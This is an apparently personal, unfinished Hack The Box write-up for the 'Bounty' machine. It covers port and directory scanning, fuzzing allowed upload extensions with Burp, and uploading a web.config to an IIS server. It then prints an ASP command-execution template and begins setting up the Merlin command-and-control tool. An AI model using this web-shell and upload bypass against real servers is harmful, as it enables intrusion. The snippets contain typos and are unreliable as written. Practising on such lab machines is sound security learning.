Hack the box write-up: Bounty
Nmap result:
Nmap scan report for 10.129.161.191
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
After the initial scan, I saw that only port 80 was open so I did the port scan
gobuster dir -u http://10.129.161.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx
It looks like it's unstable but I found transfer.aspx
File server found!
Let's test what extensions are allowed with burp
intercept > attach a file and upload > send it to repeater > observe the response
Make an extension list like this.
send it to intruder > clear $ > change payload name
go to payloads > payload options > load > select the file.
Start Attack
Only one of them had the content length of 1350, which was the config -> and it shows it was uploaded successfully.
Uploading Web.config files to IIS servers can bypass some security:
gobuster showed UploadedFiles directory.
Uploaded the web.config file and checked the file.
it's showing 3 so it's doing what the exploit is supposed to do.
ASP remote code Execution Template:
Set rs=CreatePbject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cm.StdOut.Readall()
Response.write(o)
Since I confirmed that it allows code execution I'm going to use the merlin
Merlin is a tool like metasploit.
We need a server cert inside the merlin/data/509 directory.
To generate, execute the command:
openssl req -x50 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=gorigori.rocks" -days 7a
After the server key is generated, run the program by typing "go run main.go"
For some reason, the box kept shutting down so I decided to stop working on it.
Full walkthrough is available from here: https://medium.com/@v1per/bounty-hackthebox-writeup-5b79a79e6de9
Last modified 1yr ago